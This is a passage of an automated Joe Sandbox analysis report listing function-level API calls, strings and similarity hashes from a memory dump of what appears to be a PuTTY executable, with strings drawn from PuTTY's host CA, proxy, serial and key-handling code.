                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: host$pass$port$proxyhost$proxyport$user
                    • API String ID: 0-3129514663
                    • Opcode ID: 3bafffedddae2dc47bc3a2d65059b268bc5ff00062b0a0a051ac9e73f6d8eb67
                    • Instruction ID: 705783e071c55ebdd785f874d214b447df9f51bc1d00547894b4c003f43b9623
                    • Opcode Fuzzy Hash: 3bafffedddae2dc47bc3a2d65059b268bc5ff00062b0a0a051ac9e73f6d8eb67
                    • Instruction Fuzzy Hash: 95A16772948320BBE6306A21FC83BBB7BE0DF50750F044429FD89962D2F7369A15D692
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %s$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/utils/backend_socket_log.c$Connected to %s$Connecting to %s$Connecting to %s port %d$Failed to connect to %s: %s$len >= 2$ost$te h
                    • API String ID: 4218353326-3821570074
                    • Opcode ID: 9ce47ee80fff5e22fa56ee4c14ddd5f9b26e8e8a0978205a3c00058e260667f2
                    • Instruction ID: dc9788c7987e45847554139690bdbe1a567608ef3b7f617cf5b190236889656c
                    • Opcode Fuzzy Hash: 9ce47ee80fff5e22fa56ee4c14ddd5f9b26e8e8a0978205a3c00058e260667f2
                    • Instruction Fuzzy Hash: EE31FBB5E443807BD6306A11AC57FEF3AA8DF8B758F140428F88956243EBB15994D2A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreatePen.GDI32(00000000,00000000), ref: 00BB6D98
                    • SelectObject.GDI32(00000000), ref: 00BB6DA5
                    • MoveToEx.GDI32(?,?,00000000), ref: 00BB6DB8
                    • LineTo.GDI32(00000000,00000001), ref: 00BB6DD4
                    • SelectObject.GDI32 ref: 00BB6DE3
                    • CreatePen.GDI32(00000000,00000000), ref: 00BB6E41
                    • SelectObject.GDI32(00000000), ref: 00BB6E54
                    • Polyline.GDI32(?,00000005), ref: 00BB6E65
                    • SelectObject.GDI32(00000000), ref: 00BB6E72
                    • DeleteObject.GDI32(00000000), ref: 00BB6E75
                    • SetPixel.GDI32(?,?), ref: 00BB6F18
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                    • String ID:
                    • API String ID: 1020918164-0
                    • Opcode ID: 47a22513e5b34bfd84b5ba501d4e344fdbb59ac4a56699f88126c14c43602a73
                    • Instruction ID: 2f58804c2c370ed654a8a10baac950001d6ffb958572acc022a9078245ab7171
                    • Opcode Fuzzy Hash: 47a22513e5b34bfd84b5ba501d4e344fdbb59ac4a56699f88126c14c43602a73
                    • Instruction Fuzzy Hash: 41619C71904304AFE7109F15DD94BAABBE9FF88314F584629FD9697260C7B5AC40CF81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _strrchr.LIBCMT ref: 00BD435C
                    • _strrchr.LIBCMT ref: 00BD436F
                    • CoCreateInstance.OLE32(00C7E964,00000000,00000001,00C7E954,?), ref: 00BD4416
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strrchr$CreateInstance
                    • String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/jump-list.c$Connect to PuTTY session '$Run %.*s$appname$j\h
                    • API String ID: 3526010480-2179536349
                    • Opcode ID: d06325c040096ddaec29c19db7f8aca5f3c0409b8d5f807e3544533ef400ca1a
                    • Instruction ID: 156c366adf9060e5afd35da78277adc84851fb122575f680fec3a7ec0d461e78
                    • Opcode Fuzzy Hash: d06325c040096ddaec29c19db7f8aca5f3c0409b8d5f807e3544533ef400ca1a
                    • Instruction Fuzzy Hash: 3951E9F5A443416BDA10AF619C8BF1BB6D8AF94708F144878F909A7342EB71D909C6A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEB9B0: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                      • Part of subcall function 00BEB9B0: RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BE4481,00000000,RandSeedFile), ref: 00BEBC17
                      • Part of subcall function 00BEBBF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BEBC4F
                    • _strlen.LIBCMT ref: 00BE40C4
                      • Part of subcall function 00BEBCF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00BE4743,00000000,Recent sessions), ref: 00BEBD16
                      • Part of subcall function 00BEBCF0: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00BEBD4D
                      • Part of subcall function 00C10FB0: _strlen.LIBCMT ref: 00C10FC6
                    • _strlen.LIBCMT ref: 00BE40EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: QueryValue_strlen$CloseCreate_strcat
                    • String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
                    • API String ID: 1841596437-2091482613
                    • Opcode ID: 2756ca9cff163d0e5ee9eb4d59a4c215652df88d7f057cc0670c0c543fc3133b
                    • Instruction ID: 8039ba8ec69e95d75730496af942a4a83c05454783f3ab7c1306e8a5f370e17c
                    • Opcode Fuzzy Hash: 2756ca9cff163d0e5ee9eb4d59a4c215652df88d7f057cc0670c0c543fc3133b
                    • Instruction Fuzzy Hash: 3541B4E5D003806BDA106B31AC83F3B76D89F51745F084478FC4996243F775D954E6A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEB9B0: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                      • Part of subcall function 00BEB9B0: RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                      • Part of subcall function 00BEBCB0: _strlen.LIBCMT ref: 00BEBCC0
                      • Part of subcall function 00BEBCB0: RegSetValueExA.ADVAPI32(00BE3FEC,?,00000000,00000001,00000000,-00000001,?,?,?,?,?,?,?,?,?,?), ref: 00BEBCD3
                    • _strlen.LIBCMT ref: 00BE4291
                      • Part of subcall function 00C16DE0: ___from_strstr_to_strchr.LIBCMT ref: 00C16E35
                      • Part of subcall function 00BEBBB0: RegSetValueExA.ADVAPI32(00000000,00BE42D0,00000000,00000004,00000000,00000004,?,00000000,00BE42D0,00000000,PermitRSASHA1,?), ref: 00BEBBD2
                      • Part of subcall function 00BEBA90: RegCloseKey.ADVAPI32(00000000,00BE448C,00000000), ref: 00BEBA94
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CloseValue_strlen$Create___from_strstr_to_strchr
                    • String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
                    • API String ID: 1175142446-1463427279
                    • Opcode ID: 91595f4a4e1f312cb708a9412439d17f4ef89c544498a5ff825660ba3c68449f
                    • Instruction ID: be2a03917a3cf2a7c8090687f42266fc98843795c993a42105e8fa143df1570a
                    • Opcode Fuzzy Hash: 91595f4a4e1f312cb708a9412439d17f4ef89c544498a5ff825660ba3c68449f
                    • Instruction Fuzzy Hash: 982196EAD001907FEB113A616C87E7B36948F52745F1800B1FD089A253F7418925A7A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strrchr
                    • String ID: %.*s $%.*s %d $%02x%s$%s (with certificate: %s)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/sshpubk.c$SHA256:$false && "ssh_fptype_from_cert ruled out the other values"
                    • API String ID: 3213747228-2804460150
                    • Opcode ID: 5e6b70962496dc37473eb71fdafbd894c424eb564b777550ca6fbadf273cd17d
                    • Instruction ID: 1326e6e8f10d098c3a62fef99bb20bb6367c1964fd51872a94c69c7ae37f109e
                    • Opcode Fuzzy Hash: 5e6b70962496dc37473eb71fdafbd894c424eb564b777550ca6fbadf273cd17d
                    • Instruction Fuzzy Hash: B00188F6A003592FEA106A217C8BD6B769DDEC1759F050434FC09C7102F622DE1DD5B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetForegroundWindow.USER32 ref: 00BD8C52
                    • GetCapture.USER32 ref: 00BD8C6D
                    • GetClipboardOwner.USER32 ref: 00BD8C84
                    • GetQueueStatus.USER32(00001CBF), ref: 00BD8CA0
                    • GetCursorPos.USER32(?), ref: 00BD8CC0
                    • GlobalMemoryStatus.KERNEL32 ref: 00BD8CD6
                    • GetCurrentThread.KERNEL32 ref: 00BD8CF5
                    • GetThreadTimes.KERNEL32(00000000,?,?,?,?), ref: 00BD8D04
                    • GetCurrentProcess.KERNEL32 ref: 00BD8D17
                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00BD8D22
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
                    • String ID:
                    • API String ID: 3596705544-0
                    • Opcode ID: b160fad8173ef79ad077972ba9f88c16e17bc4f5e33cd09991837fbe2d7b1e04
                    • Instruction ID: 093fcf7485180577ef9e684dce68fb297408a07e5edf189ea37bea320175a481
                    • Opcode Fuzzy Hash: b160fad8173ef79ad077972ba9f88c16e17bc4f5e33cd09991837fbe2d7b1e04
                    • Instruction Fuzzy Hash: 0B2182B29413107BD6106BA1AC0AF9F7FA8EF4A75EF040419F64A972C1EA715504CBE7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BF6C1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ___from_strstr_to_strchr
                    • String ID: %s$%s%s$A46$LRD$Specified forwarding already exists$You need to specify a destination addressin the form "host.name:port"$You need to specify a source port number
                    • API String ID: 601868998-44983218
                    • Opcode ID: 97226edceb0b56e313cd4806961f0b51e0a405534159776a89353d53616a179e
                    • Instruction ID: f341ce94d27beab4c304984e1dcc89f11484bf556c06b3728db0e7d95e95b278
                    • Opcode Fuzzy Hash: 97226edceb0b56e313cd4806961f0b51e0a405534159776a89353d53616a179e
                    • Instruction Fuzzy Hash: 8791E3B5A043447BDB116721AC47E3B77E9DF91748F0808B9FD8997353FA22AD188263
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemText
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
                    • API String ID: 3367045223-1561147066
                    • Opcode ID: 3193ec4fd352bd4988fc13539cbaaf1c4e9a9b9aed91f1c12313fafe85b64322
                    • Instruction ID: c156416699634503ef18a62df37a4ab6e752268b07b8ab5be0b35e7e7a58189b
                    • Opcode Fuzzy Hash: 3193ec4fd352bd4988fc13539cbaaf1c4e9a9b9aed91f1c12313fafe85b64322
                    • Instruction Fuzzy Hash: 9721E7B2A00145AFDB10AF54AC46E2BB7D5EB95708F0500B9F80997312F631ED18D762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C73082: CreateFileW.KERNEL32(00000000,00000000,?,00C72D40,?,?,00000000,?,00C72D40,00000000,0000000C), ref: 00C7309F
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BD4CA5), ref: 00C72DAB
                    • __dosmaperr.LIBCMT ref: 00C72DB2
                    • GetFileType.KERNEL32(00000000), ref: 00C72DBE
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BD4CA5), ref: 00C72DC8
                    • __dosmaperr.LIBCMT ref: 00C72DD1
                    • CloseHandle.KERNEL32(00000000), ref: 00C72DF1
                    • CloseHandle.KERNEL32(00C6C004), ref: 00C72F3E
                    • GetLastError.KERNEL32 ref: 00C72F70
                    • __dosmaperr.LIBCMT ref: 00C72F77
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID:
                    • API String ID: 4237864984-0
                    • Opcode ID: b8cca802a9a8d194db806a359067aab5be4659a2ee20c7ca17995221adfda20d
                    • Instruction ID: ed80946203c6721d6fbf75b085e57e43f120fd961ba53ec8027c72cacb049864
                    • Opcode Fuzzy Hash: b8cca802a9a8d194db806a359067aab5be4659a2ee20c7ca17995221adfda20d
                    • Instruction Fuzzy Hash: EAA13432A101549FCF299F78DC92BAE7BB1AB06320F14814DF816EF391DB358A46DB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC367
                    • OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC375
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3B4
                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3D1
                    • GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3FB
                    • CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BEC41A
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC43B
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC44A
                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC455
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                    • String ID:
                    • API String ID: 621491157-0
                    • Opcode ID: be7b6469d37c98617861482998429b3e9609533306032f80109202ab24eaf441
                    • Instruction ID: 168bdd4a540418d693c13e5648d763efb340f6a911bd5335af013eba85c88c20
                    • Opcode Fuzzy Hash: be7b6469d37c98617861482998429b3e9609533306032f80109202ab24eaf441
                    • Instruction Fuzzy Hash: 7831CD71204350AFE7206FA6DC89B3F7FE8EB40B45F008168F906D62E1DB719801D7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _strlen.LIBCMT ref: 00BD8652
                      • Part of subcall function 00BD3040: SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00BD30C4
                      • Part of subcall function 00BD30F0: SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BD3177
                    Strings
                    • Cannot decode key: %s, xrefs: 00BD872B
                    • Unable to load host CA record '%s', xrefs: 00BD85FC
                    • Invalid key (no key type), xrefs: 00BD8715
                    • CA key may not be a certificate (type is '%.*s'), xrefs: 00BD870B
                    • Invalid '%.*s' key data, xrefs: 00BD879B
                    • Unrecognised key type '%.*s', xrefs: 00BD8745
                    Similarity
                    • API ID: ItemMessageSend$_strlen
                    • String ID: CA key may not be a certificate (type is '%.*s')$Cannot decode key: %s$Invalid '%.*s' key data$Invalid key (no key type)$Unable to load host CA record '%s'$Unrecognised key type '%.*s'
                    • API String ID: 706372605-3650709019
                    • Opcode ID: de49a28b6c93558fc095c8fc165d3bf17c0fb767a374695eb492e5c7e523a771
                    • Instruction ID: 29a9462bf616ab52b902fb6c6d0878f0385aee3cb674dfe76e9961acd823abc5
                    • Opcode Fuzzy Hash: de49a28b6c93558fc095c8fc165d3bf17c0fb767a374695eb492e5c7e523a771
                    • Instruction Fuzzy Hash: 7A81EAF59002007BD6107B61BC46E67FADCEF5575AF180476F80D91303FA22E92896E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _strlen.LIBCMT ref: 00C22B6B
                    • _strlen.LIBCMT ref: 00C22BB0
                      • Part of subcall function 00C16E60: _strlen.LIBCMT ref: 00C16E6A
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    Strings
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID: *password*$Proxy password: $Proxy username: $Sending Telnet proxy command: $Telnet proxy authentication
                    • API String ID: 1497175149-2037000550
                    • Opcode ID: 187f2e08f21679dd1776d1cc4ae29fa5ba4c9901c58dc5c7a9a4624cbbc6fc78
                    • Instruction ID: c9b97aaa021e9350360a2bdf6e5bf411bf509d9a53db1a758b1420b9b4621954
                    • Opcode Fuzzy Hash: 187f2e08f21679dd1776d1cc4ae29fa5ba4c9901c58dc5c7a9a4624cbbc6fc78
                    • Instruction Fuzzy Hash: 5A8114B5900205BFDB10EF24EC46F6AB7A5FF44314F144568F8195B2A2E732EA24DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsZoomed.USER32 ref: 00BB8036
                    • GetDesktopWindow.USER32 ref: 00BB80FF
                    • GetClientRect.USER32(00000000), ref: 00BB8109
                    • IsZoomed.USER32 ref: 00BB81A2
                    • SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000116), ref: 00BB8203
                    • InvalidateRect.USER32(00000000,00000001), ref: 00BB8221
                    Strings
                    Similarity
                    • API ID: RectWindowZoomed$ClientDesktopInvalidate
                    • String ID: (
                    • API String ID: 2702938005-3887548279
                    • Opcode ID: 89962de35735b91de6de2e28b7554a2ee6c2a5d3f5cbd175ab8b0ea4a645cbd2
                    • Instruction ID: 607e29cfbe66ac347f1d43a90f6849b254cb1aa1748ba5725e8f57f64c1fd51f
                    • Opcode Fuzzy Hash: 89962de35735b91de6de2e28b7554a2ee6c2a5d3f5cbd175ab8b0ea4a645cbd2
                    • Instruction Fuzzy Hash: 0151C2706042019FDB15AF28EC56BAF3BE9EB44305F580968F946E72B1EFB1D840CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BDC0E2
                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 00BDC11D
                    • GetLastError.KERNEL32 ref: 00BDC190
                      • Part of subcall function 00BDC330: GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00BDC140,?), ref: 00BDC34C
                      • Part of subcall function 00C15D30: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00C15D71
                      • Part of subcall function 00C15D30: InitializeCriticalSection.KERNEL32(00CB33E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00C15DCA
                      • Part of subcall function 00C15D30: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 00C15DD8
                      • Part of subcall function 00C15D30: CreateThread.KERNEL32 ref: 00C15E02
                      • Part of subcall function 00C15D30: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00C15E0D
                      • Part of subcall function 00C15A50: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15A91
                      • Part of subcall function 00C15A50: InitializeCriticalSection.KERNEL32(00CB33E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15ADA
                      • Part of subcall function 00C15A50: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15AE8
                      • Part of subcall function 00C15A50: CreateThread.KERNEL32 ref: 00C15B12
                      • Part of subcall function 00C15A50: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15B1D
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    Strings
                    Similarity
                    • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState___from_strstr_to_strchr_strcat_strlen
                    • String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
                    • API String ID: 3096320600-1737485005
                    • Opcode ID: d6fc8c77c097cc7fa83bb33b29d1a6c72efc16f3bd1972a2feb6f18c8df6ad6d
                    • Instruction ID: 36ced7ab554e01f3eb0dbf400613100231320e545f87fdd6f1d0b0cde316f356
                    • Opcode Fuzzy Hash: d6fc8c77c097cc7fa83bb33b29d1a6c72efc16f3bd1972a2feb6f18c8df6ad6d
                    • Instruction Fuzzy Hash: 234191F5A00300AFE7106F21AC4AF277AE8EB55718F140569F9099B393F771E904CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
